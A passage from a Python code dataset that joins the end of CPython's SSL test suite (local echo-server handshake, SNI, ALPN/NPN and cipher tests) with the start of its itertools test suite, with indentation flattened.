# (name, method, whether to expect success, *args)
send_methods = [
('send', s.send, True, []),
('sendto', s.sendto, False, ["some.address"]),
('sendall', s.sendall, True, []),
]
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = u"PREFIX_"
for meth_name, send_meth, expect_success, args in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
send_meth(indata, *args)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
s.write(b"over\n")
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen(5)
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
ssl.wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegexp(ssl.SSLError, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
evt = threading.Event()
remote = [None]
peer = [None]
def serve():
server.listen(5)
# Block on the accept and wait on the connection to close.
evt.set()
remote[0], peer[0] = server.accept()
remote[0].recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote[0].close()
server.close()
# Sanity checks.
self.assertIsInstance(remote[0], ssl.SSLSocket)
self.assertEqual(peer[0], client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
with closing(context.wrap_socket(socket.socket())) as sock:
with self.assertRaises(socket.error) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
try:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
except ssl.SSLError:
self.skipTest("no DES cipher available")
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
with self.assertRaises(ssl.SSLError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=False) as server:
with closing(context.wrap_socket(socket.socket())) as s:
self.assertIs(s.version(), None)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with closing(context.wrap_socket(socket.socket())) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_itertools.py
|
import doctest
import unittest
from test import support
from itertools import *
import weakref
from decimal import Decimal
from fractions import Fraction
import operator
import random
import copy
import pickle
from functools import reduce
import sys
import struct
import threading
import gc
maxsize = support.MAX_Py_ssize_t
minsize = -maxsize-1
def lzip(*args):
return list(zip(*args))
def onearg(x):
'Test function of one argument'
return 2*x
def errfunc(*args):
'Test function that raises an error'
raise ValueError
def gen3():
'Non-restartable source sequence'
for i in (0, 1, 2):
yield i
def isEven(x):
'Test predicate'
return x%2==0
def isOdd(x):
'Test predicate'
return x%2==1
def tupleize(*args):
return args
def irange(n):
for i in range(n):
yield i
class StopNow:
'Class emulating an empty iterable.'
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def take(n, seq):
'Convenience function for partially consuming a long of infinite iterable'
return list(islice(seq, n))
def prod(iterable):
return reduce(operator.mul, iterable, 1)
def fact(n):
'Factorial'
return prod(range(1, n+1))
# root level methods for pickling ability
def testR(r):
return r[0]
def testR2(r):
return r[2]
def underten(x):
return x<10
picklecopiers = [lambda s, proto=proto: pickle.loads(pickle.dumps(s, proto))
for proto in range(pickle.HIGHEST_PROTOCOL + 1)]
class TestBasicOps(unittest.TestCase):
def pickletest(self, protocol, it, stop=4, take=1, compare=None):
"""Test that an iterator is the same after pickling, also when part-consumed"""
def expand(it, i=0):
# Recursively expand iterables, within sensible bounds
if i > 10:
raise RuntimeError("infinite recursion encountered")
if isinstance(it, str):
return it
try:
l = list(islice(it, stop))
except TypeError:
return it # can't expand it
return [expand(e, i+1) for e in l]
# Test the initial copy against the original
dump = pickle.dumps(it, protocol)
i2 = pickle.loads(dump)
self.assertEqual(type(it), type(i2))
a, b = expand(it), expand(i2)
self.assertEqual(a, b)
if compare:
c = expand(compare)
self.assertEqual(a, c)
# Take from the copy, and create another copy and compare them.
i3 = pickle.loads(dump)
took = 0
try:
for i in range(take):
next(i3)
took += 1
except StopIteration:
pass #in case there is less data than 'take'
dump = pickle.dumps(i3, protocol)
i4 = pickle.loads(dump)
a, b = expand(i3), expand(i4)
self.assertEqual(a, b)
if compare:
c = expand(compare[took:])
self.assertEqual(a, c);
def test_accumulate(self):
self.assertEqual(list(accumulate(range(10))), # one positional arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
self.assertEqual(list(accumulate(iterable=range(10))), # kw arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
for typ in int, complex, Decimal, Fraction: # multiple types
self.assertEqual(
list(accumulate(map(typ, range(10)))),
list(map(typ, [0, 1, 3, 6, 10, 15, 21, 28, 36, 45])))
self.assertEqual(list(accumulate('abc')), ['a', 'ab', 'abc']) # works with non-numeric
self.assertEqual(list(accumulate([])), []) # empty iterable
self.assertEqual(list(accumulate([7])), [7]) # iterable of length one
self.assertRaises(TypeError, accumulate, range(10), 5, 6) # too many args
self.assertRaises(TypeError, accumulate) # too few args
self.assertRaises(TypeError, accumulate, x=range(10)) # unexpected kwd arg
self.assertRaises(TypeError, list, accumulate([1, []])) # args that don't add
s = [2, 8, 9, 5, 7, 0, 3, 4, 1, 6]
self.assertEqual(list(accumulate(s, min)),
[2, 2, 2, 2, 2, 0, 0, 0, 0, 0])
self.assertEqual(list(accumulate(s, max)),
[2, 8, 9, 9, 9, 9, 9, 9, 9, 9])
self.assertEqual(list(accumulate(s, operator.mul)),
[2, 16, 144, 720, 5040, 0, 0, 0, 0, 0])
with self.assertRaises(TypeError):
list(accumulate(s, chr)) # unary-operation
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, accumulate(range(10))) # test pickling
self.pickletest(proto, accumulate(range(10), initial=7))
self.assertEqual(list(accumulate([10, 5, 1], initial=None)), [10, 15, 16])
self.assertEqual(list(accumulate([10, 5, 1], initial=100)), [100, 110, 115, 116])
self.assertEqual(list(accumulate([], initial=100)), [100])
with self.assertRaises(TypeError):
list(accumulate([10, 20], 100))
def test_chain(self):
def chain2(*iterables):
'Pure python version in the docs'
for it in iterables:
for element in it:
yield element
for c in (chain, chain2):
self.assertEqual(list(c('abc', 'def')), list('abcdef'))
self.assertEqual(list(c('abc')), list('abc'))
self.assertEqual(list(c('')), [])
self.assertEqual(take(4, c('abc', 'def')), list('abcd'))
self.assertRaises(TypeError, list,c(2, 3))
def test_chain_from_iterable(self):
self.assertEqual(list(chain.from_iterable(['abc', 'def'])), list('abcdef'))
self.assertEqual(list(chain.from_iterable(['abc'])), list('abc'))
self.assertEqual(list(chain.from_iterable([''])), [])
self.assertEqual(take(4, chain.from_iterable(['abc', 'def'])), list('abcd'))
self.assertRaises(TypeError, list, chain.from_iterable([2, 3]))
def test_chain_reducible(self):
for oper in [copy.deepcopy] + picklecopiers:
it = chain('abc', 'def')
self.assertEqual(list(oper(it)), list('abcdef'))
self.assertEqual(next(it), 'a')
self.assertEqual(list(oper(it)), list('bcdef'))
self.assertEqual(list(oper(chain(''))), [])
self.assertEqual(take(4, oper(chain('abc', 'def'))), list('abcd'))
self.assertRaises(TypeError, list, oper(chain(2, 3)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, chain('abc', 'def'), compare=list('abcdef'))
def test_chain_setstate(self):
self.assertRaises(TypeError, chain().__setstate__, ())
self.assertRaises(TypeError, chain().__setstate__, [])
self.assertRaises(TypeError, chain().__setstate__, 0)
self.assertRaises(TypeError, chain().__setstate__, ([],))
self.assertRaises(TypeError, chain().__setstate__, (iter([]), []))
it = chain()
it.__setstate__((iter(['abc', 'def']),))
self.assertEqual(list(it), ['a', 'b', 'c', 'd', 'e', 'f'])
it = chain()
it.__setstate__((iter(['abc', 'def']), iter(['ghi'])))
self.assertEqual(list(it), ['ghi', 'a', 'b', 'c', 'd', 'e', 'f'])
def test_combinations(self):
self.assertRaises(TypeError, combinations, 'abc') # missing r argument
self.assertRaises(TypeError, combinations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, combinations, None) # pool is not iterable
self.assertRaises(ValueError, combinations, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(combinations('abc', 32))), []) # r > n
self.assertEqual(list(op(combinations('ABCD', 2))),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
testIntermediate = combinations('ABCD', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(op(combinations(range(4), 3))),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
testIntermediate = combinations(range(4), 3)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[(0,1,3), (0,2,3), (1,2,3)])
def combinations1(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = list(range(r))
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1
for j in range(i+1, r):
indices[j] = indices[j-1] + 1
yield tuple(pool[i] for i in indices)
def combinations2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in permutations(range(n), r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def combinations3(iterable, r):
'Pure python version from cwr()'
pool = tuple(iterable)
n = len(pool)
for indices in combinations_with_replacement(range(n), r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(combinations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(r) / fact(n-r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for c in result:
self.assertEqual(len(c), r) # r-length combinations
self.assertEqual(len(set(c)), r) # no duplicate elements
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(list(c),
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(combinations1(values, r))) # matches first pure python version
self.assertEqual(result, list(combinations2(values, r))) # matches second pure python version
self.assertEqual(result, list(combinations3(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, combinations(values, r)) # test pickling
@support.bigaddrspacetest
def test_combinations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations("AA", 2**29)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_tuple_reuse(self):
self.assertEqual(len(set(map(id, combinations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(combinations('abcde', 3))))), 1)
def test_combinations_with_replacement(self):
cwr = combinations_with_replacement
self.assertRaises(TypeError, cwr, 'abc') # missing r argument
self.assertRaises(TypeError, cwr, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, cwr, None) # pool is not iterable
self.assertRaises(ValueError, cwr, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(cwr('ABC', 2))),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
testIntermediate = cwr('ABC', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def cwr1(iterable, r):
'Pure python version shown in the docs'
# number items returned: (n+r-1)! / r! / (n-1)! when n>0
pool = tuple(iterable)
n = len(pool)
if not n and r:
return
indices = [0] * r
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != n - 1:
break
else:
return
indices[i:] = [indices[i] + 1] * (r - i)
yield tuple(pool[i] for i in indices)
def cwr2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in product(range(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def numcombs(n, r):
if not n:
return 0 if r else 1
return fact(n+r-1) / fact(r)/ fact(n-1)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(cwr(values, r))
self.assertEqual(len(result), numcombs(n, r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
regular_combs = list(combinations(values, r)) # compare to combs without replacement
if n == 0 or r <= 1:
self.assertEqual(result, regular_combs) # cases that should be identical
else:
self.assertTrue(set(result) >= set(regular_combs)) # rest should be supersets of regular combs
for c in result:
self.assertEqual(len(c), r) # r-length combinations
noruns = [k for k,v in groupby(c)] # combo without consecutive repeats
self.assertEqual(len(noruns), len(set(noruns))) # no repeats other than consecutive
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(noruns,
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(cwr1(values, r))) # matches first pure python version
self.assertEqual(result, list(cwr2(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cwr(values,r)) # test pickling
@support.bigaddrspacetest
def test_combinations_with_replacement_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations_with_replacement("AA", 2**30)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_with_replacement_tuple_reuse(self):
cwr = combinations_with_replacement
self.assertEqual(len(set(map(id, cwr('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(cwr('abcde', 3))))), 1)
def test_permutations(self):
self.assertRaises(TypeError, permutations) # too few arguments
self.assertRaises(TypeError, permutations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, permutations, None) # pool is not iterable
self.assertRaises(ValueError, permutations, 'abc', -2) # r is negative
self.assertEqual(list(permutations('abc', 32)), []) # r > n
self.assertRaises(TypeError, permutations, 'abc', 's') # r is not an int or None
self.assertEqual(list(permutations(range(3), 2)),
[(0,1), (0,2), (1,0), (1,2), (2,0), (2,1)])
def permutations1(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = list(range(n))
cycles = list(range(n-r+1, n+1))[::-1]
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def permutations2(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(permutations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(n-r)) # right number of perms
